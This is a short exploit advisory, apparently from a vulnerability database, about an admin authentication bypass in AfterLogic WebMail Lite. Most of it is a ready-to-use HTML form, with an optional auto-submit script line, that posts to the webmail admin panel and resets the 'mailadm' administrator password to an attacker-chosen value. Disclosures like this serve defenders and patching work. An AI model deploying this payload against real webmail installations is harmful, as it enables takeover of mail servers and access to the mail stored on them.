AfterLogic WebMail Lite Authentication Bypass

2015.03.28
Credit: Paulos Yibelo
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

AfterLogic WebMail Lite is a free web-based IMAP and SMTP email-client with Ajax interface. AfterLogic WebMail Lite is available for both PHP and ASP.NET platforms. The version of AfterLogic WebMail Lite that is written in PHP is free and open-source software subject to the terms of the Affero General Public License (AGPL) version 3. The version written in ASP.NET is proprietary software available as freeware. And is deployed over 5/20 mailsevers, quite popular. This exploit attempts to exploit the admin and get(s) us a new password to the admin panel which should be located at site.com/mail/adminpanel/index.php <h2>After Logic Mail - Change Admin Password Exploit</h2> <form action="http://localhost/webmail/adminpanel/index.php?submit" method="POST" id="security_form"> <input type="hidden" name="form_id" value="security"> <input type="text" class="wm_input" name="txtUserName" id="txtUserName" value="mailadm" size="30" /> <input type="password" class="wm_input" name="txtNewPassword" id="txtNewPassword" value="newpass" size="30" /> <input type="password" class="wm_input" name="txtConfirmNewPassword" id="txtConfirmNewPassword" value="newpass" size="30" /> <input type="submit" name="submit_btn" value="Save" id="automate"> </form> <script> //uncomment the second line for automation //document.getElementById('automate').click(); </script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top